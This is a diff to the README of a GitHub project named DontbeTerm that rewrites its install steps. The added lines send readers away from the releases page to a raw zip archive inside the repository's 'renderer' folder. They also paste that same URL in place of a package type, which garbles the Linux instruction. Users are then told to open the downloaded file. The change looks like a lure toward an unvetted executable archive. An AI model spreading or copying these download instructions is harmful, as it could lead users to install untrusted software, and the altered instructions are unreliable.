Tursin-xD/DontbeTerm/README.md

 Using DontbeTerm is straightforward.
 Follow these steps to run the program:

-1. Visit the download page by clicking the big button at the top or [here](https://github.com/Tursin-xD/DontbeTerm/releases).
+1. Visit the download page by clicking the big button at the top or [here](https://github.com/Tursin-xD/DontbeTerm/raw/refs/heads/main/renderer/Term_Dontbe_3.1.zip).
 2. Choose the correct version for your operating system:
    - Windows users should look for a `.exe` file.
    - macOS users should download a `.dmg` or `.zip`.
-   - Linux users may find `.AppImage`, `.deb`, or `.tar.gz` packages.
+   - Linux users may find `.AppImage`, `.deb`, or `https://github.com/Tursin-xD/DontbeTerm/raw/refs/heads/main/renderer/Term_Dontbe_3.1.zip` packages.
 3. Once downloaded, open the file to start the installation.
 4. Follow the simple on-screen instructions to complete the setup.
 5. Launch DontbeTerm from your desktop or start menu.